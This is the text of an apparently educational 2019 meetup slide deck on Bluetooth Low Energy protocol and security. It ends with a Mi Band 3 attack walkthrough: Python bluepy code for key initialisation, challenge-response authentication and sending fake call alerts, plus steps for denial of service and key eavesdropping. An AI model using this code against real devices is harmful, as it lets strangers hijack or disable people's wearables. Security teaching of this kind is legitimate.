2600 Thailand meeting. June 5, 2019 The purpose is just to learn BLE protocol and security. - Talk about how BLE device connect with each other. - Talk about BLE security. - Talk about BLE GATT. - Talk about how to interface with BLE using API. - Talk about Mi Band 3 compromise.

1. Controlling Bluetooth Low
Energy Devices
Keerati Torach
KPMG Thailand

2. Clarification
• First of all, for educational purpose only.
• This is not my research (for Mi Band 3), credit go to
https://medium.com/@yogeshojha/i-hacked-xiaomi-miband-3-and-here-is-how-i-
did-it-43d68c272391 and https://medium.com/machine-learning-world/how-i-
hacked-xiaomi-miband-2-to-control-it-from-linux-a5bd2f36d3ad
• I just need to learn how devices are communicate with each other using Bluetooth
Low Energy technology.
• Technical problems or mistakes occurred in this talk, please accept my apology.
• Any suggestions are welcome.

3. Introduction to Bluetooth Low Energy
• BLE or Bluetooth Smart is a wireless personal area network introduced in
Bluetooth version 4.0, which aims to reduce power consumption comparing with
Classic Bluetooth. Most of operating systems are natively support BLE.
nRF App in Android.
macOS on MacBook Pro is support BLE.
https://play.google.com/store/apps/details?id=no.nordicsemi.android.mcp&hl=en_IN

4. Internet of Things
• Due to low energy, BLE is supported in many IoT device.
http://masterlockbluetoothsmart.com
https://www.cbyge.com
https://www.mi.com/mi-band-3/

5. Xiaomi Ecosystem
https://dgiese.scripts.mit.edu/talks/DEFCON26/DEFCON26-Having_fun_with_IoT-Xiaomi.pdf

6. IoT Security Assessment Methodology
• By @Attify.
Firmware
• Obtaining
• Extracting
• Binary
Analysis
• Backdooring
Hardware
• UART
• SPI
• I2C
• JTAG
Conventional
• Mobile App
• Web App
• Networking
• Other App
Radio
• Raw RF
• Zigbee
• BLE
https://github.com/adi0x90/IoT-Pentesting-Methodology

7. OWASP IoT Top10 2018
• The vulnerability is generally placed in No.3, including but not limited to the
ecosystem interfaces.
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project

8. BLE Stack
• In this talk, I’ll mainly focus on GATT.
GAP is responsible for
the discovery and device
connection.
Broadcaster – A device that
advertises data waiting for
connection, if connected
this device may be called
Peripheral.
Observer – A device listens
for advertised data from
Broadcaster, if connected
this device may be called
Central.
GATT is responsible
for information exchange.
Client – Request data by
sending request to a server.
Server – Process and
response data upon a client
request message.
Underlying framework of
GATT use for accessing
data.
https://www. bluetooth.com/specifications/bluetooth-core-specification

9. BLE Device Association
https://www.slideshare.net/Shakacon/when-encryption-is-not-enoughsumanth-naropanth-chandra-prakash-gopalaiah-kavya-racharla

10. BLE Pairing Method
• Just Works.
• PIN is always 000000.
• Passkey Entry.
• 6-digit PIN (000000 - 999999).
• Out of Band.
• Share the PIN via OOB channel e.g. NFC.
• Rarely.

11. BLE =< 4.1 Passive Eavesdropping
https://www.bluetooth.com/specifications/archived-specifications/

12. Cracking the Temporary Key (BLE =< 4.1)
• Temporary Key (TK) -> Short Term Key (STK)
• Short Term Key (STK) -> Long Term Key (LTK)
confirm = AES(TK, AES(TK, rand ⊕ p1) ⊕ p2)
Parameters which can be passively intercepted as a clear-text.
https://lacklustre.net/bluetooth/bluetooth_smart_good_bad_ugly_fix-mikeryan-blackhat_2013.pdf
Parameters need to be brute force.

13. Sniffing BLE Packet Over the Air
• Ubertooth
https://greatscottgadgets.com/ubertoothone/
https://github.com/mikeryan/crackle
Crackle is a tool use to crack Temporary Key (TK) found
during BLE pairing process, and consequently derive Long
Term Key (LTK), which is used to decrypt BLE traffic.
The traffic can be passively intercepted and
saved as PCAP.

14. Secure Pairing in BLE =< 4.1
• The idea is..
• Perform once.
• Perform in an secure channel !!!

15. Generic Attribute Profile (GATT)
GATT
Server
GATT
Client
Data Store
Data
Formatting

16. Generic Attribute Profile (GATT)
Service
Service
Handle Type Permissions Value Value length
0x0000 - 0xffff UUID RO Service UUID 2,4,16 Bytes
Characteristic
Characteristic
Handle Type Permissions Value Value length
0x0001 UUID RO 0x0002 5,7,9 Bytes
0x0002 UUID Any Actual value Vary
Descriptor
Handle Type Permission Value Value length
0x0028 UUID (0x2902) RW 0x0001 2 Bytes
Notification enabled.
https://www.oreilly.com/library/view/getting-started-with/9781491900550/ch04.html
GATT
Server
Data Store
Data
Formatting

17. GATT Visualization
https://medium.com/@urish/reverse-engineering-a-bluetooth-lightbulb-56580fcb7546
https://www.oreilly.com/library/view/getting-started-with/9781491900550/ch04.html

18. BLE Peripheral Simulator (Android)
Peripheral.
Central (Bluesee).
https://play.google.com/store/apps/details?id=io.github.webbluetoothcg.bletestperipheral&hl=en_US
https://itunes.apple.com/us/app/bluesee-ble-debugger/id1336679524?mt=12

19. BLE Peripheral Simulator Connected with Bluesee
Service is resolved as Battery.
Characteristic is resolved as Battery Level.
Characteristic value.
Characteristic descriptor,
in this case Notification is enabled.
https://www.bluetooth.com/specifications/gatt/characteristics/https://www.bluetooth.com/specifications/gatt/services/https://www.bluetooth.com/specifications/gatt/descriptors/

20. hcitool and gatttool
Discover advertised devices.
Connected. List available services.
List available characteristics.
Handle of a characteristic. Handle of a characteristic’s value.
Communicate with the device.

21. Reading a Characteristic Value

22. Writing to a Characteristic
Battery Level.
Battery Level.
Characteristic declaration.
Characteristic configuration.
Characteristic user description.
The current charge
Write with response.
Write without response.
Generally, this is a subscription status.

23. Live DEMO
• Interacting with BLE Peripheral Simulator App and obtaining the Battery Level using
hcitool and gatttool.
• Notifying Battery Level from the peripheral.
• Replacing the original value of Characteristic User Description (Handle = 0x002c).

24. BLE API
• Bluepy.
• Interfacing Bluez with Python.
• Linux only for BLE.
• Noble (Node.js) is BLE central module available for macOS, Windows and Linux with
BLE supported (I don’t try it yet).
https://github.com/noble/noble
https://github.com/IanHarvey/bluepy

25. Scanner
from bluepy.btle import Scanner
scanner = Scanner()
devices = scanner.scan(5.0)
for device in devices:
for (adtype, desc, value) in device.getScanData():
if value == 'Galaxy A8 (2018)':
global galaxy_addr
galaxy_addr = device.addr
print('Galaxy address is %s'%galaxy_addr)
http://ianharvey.github.io/bluepy-doc/

26. Reading a Characteristic Value
from bluepy.btle import Peripheral, ADDR_TYPE_RANDOM
conn = Peripheral(addr, ADDR_TYPE_RANDOM)
#We’ve known Handle of Characteristic earlier
print conn.readCharacteristic(0x0016) #Device name
data = conn.readCharacteristic(0x002A) #Battery level
dec_data = int(data.encode('hex'),16)
char_desc = conn.readCharacteristic(0x002c)
print char_desc + ' : ' + str(dec_data)
conn.disconnect()
http://ianharvey.github.io/bluepy-doc/

27. Live DEMO
• Read a value of Characteristic of BLE Simulator Peripheral using Bluepy.

28. Getting Your Hands Dirty
• Mi Band 3
Mi Fit App
Only Android.
https://www.bluetooth.com/blog/debugging-bluetooth-with-an-android-app/

29. Attack Scenarios
• Unpaired Mi Band 3.
• Paired Mi Band 3.

30. Mi Band 3’s Characteristics
Custom Services.

31. Mi Band 3 Authentication
Writing the value 0x0100 using Handle 0x005b for enabling Auth Notification.
Writing a random key (AES128) by appending to the value 0x0100 using Handle 0x005a.
Response. 1
Notification.2
Writing the value 0x0200 using Handle 0x005a to request a random number.
Notify a random number. 3
Writing the encrypted random number (AES128 - ECB) by appending to the value 0x0300
using Handle 0x005a
Notification.4
Alert, firmware update, configuration, get heart rate.
Mi Fit App
https://github.com/yogeshojha/MiBand3/blob/master/auth.py
Pairing signal.

32. Bluetooth HCI Snoop Log From Mi Fit
Write with response.
Write without response
x01x00 + AES-128 Key.2

33. Sending the Pairing Signal Using gatttool
This process can run once.

34. Live DEMO
• Sending the pairing signal to initialize the key (gatttool or Bluesee or nRF).
• Handle = 005a, Characteristic = 00000009-0000-3512-2118-0009af100700, Service =
FEE1

35. Automating the Task with Bluepy
• Mi Band 3 will terminate the session after 30 second.
KEY = 'I_AM_INEVITABLE.'
conn = Peripheral(addr, ADDR_TYPE_RANDOM)
conn.setDelegate(MyDelegate())
#Enabling notification on Auth
conn.writeCharacteristic(0x005b, 'x01x00', True)
#Initializing a key (can run once)
if len(sys.argv) == 2:
if sys.argv[1] == 'init':
print 'Initializing.'
send_key = 'x01x00' + KEY
conn.writeCharacteristic(0x005a, send_key)
conn.waitForNotifications(5.0)
conn.disconnect()
exit(0)
Write with response.
Write without response.
Register to Delegate to handle a notification.
Enter to a notification handling method in MyDelegate().

36. Handling a Notification with Bluepy
from bluepy.btle import DefaultDelegate
class MyDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleNotification(self, hnd, data):
if data == 'x10x01x01':
print 'Initialized.’
(..SNIP..)
conn.setDelegate(MyDelegate())
(..SNIP..)
conn.waitForNotifications(1.0)
(..SNIP..)
handleNotification() will be called.

37. Challenge-Response
class MyDelegate(DefaultDelegate):
(..SNIP..)
def handleNotification(self, hnd, data):
if data == 'x10x03x01':
print 'Authenticated.'
(..SNIP..)
else:
global rand_num
rand_num = data[3:]
return rand_num
(..SNIP..)
#Requesting a random number (challenge)
conn.writeCharacteristic(0x005a, 'x02x00')
conn.waitForNotifications(2.0)
#Sending an encrypted random number (response)
aes = AES.new(KEY, AES.MODE_ECB)
enc_req = 'x03x00' + aes.encrypt(rand_num)
conn.writeCharacteristic(0x005a, enc_req)
conn.waitForNotifications(2.0)

38. Sending a Fake Call
• First Two Byte -> Notification Type
x01x01 -> Email
x03x01 -> Call
x04x01 -> Missed Call
x05x01 -> SMS/MMS
#Sending a fake call
fake = 'PWNED'
conn.writeCharacteristic(0x001f, 'x03x01' + fake, True)
https://medium.com/@yogeshojha/i-hacked-xiaomi-miband-3-and-here-is-how-i-did-it-43d68c272391

39. Live DEMO
• Bring the code snippet together.
• Initialize a key.
• Send a fake call.

40. Everything has Built
• https://github.com/yogeshojha/MiBand3

41. Dealing with a Paired Device
• The concept is we just need to be able to connect Mi Band 3 even it already paired,
conditions are ..
• The connection between Mi Fit App and Mi Band 3 is terminated (Bluetooth on mobile is
off or out of range).
• "Discoverable Mode" is set to on (off by default) in case of Bluetooth connection is
being established.
Disconnected BLE sign.

42. Denial of Service on a Paired Device
• As we’ve known that the key (pairing signal) will be initialized once, we can force to
change the current key and Mi Fit will become unavailable unless the new pairing
will be newly processed.
• User interaction required.
The value indicates key initialized.
The value indicates key uninitialized.

43. Video
• Unauthorized transmitting the key to paired-Mi Band 3 to cause Mi Fit
unconnectable.

44. Controlling a Paired Device
• Even though the key is chosen by Mi Fit but we can initialize the key by ourselves.
Why not?
• User interaction required.
• If we have Ubertooth, we may passively sniff the initialized key due to the bad key
exchange.
• No user interaction required.

45. Controlling a Paired Device
0x010012345678901234567890123456789012
Legitimate Pairing…
Eavesdrop.
Use the key to authenticate
and fully control a device
without user interaction.

46. Eavesdropping the Key
• The initialized key may be eavesdropped, then, use it for authentication in
challenge-response scheme.
• In this case, we don’t have Ubertooth, therefore, Bluetooth HCI snoop log will be
simulated instead.
0x0100{KEY}

47. Video
• Eavesdrop the key during a pairing process.
• Use the extracted key from eavesdropping to authenticate and fully control paired-
Mi Band 3 without user interaction.

48. THANK YOU
Q&A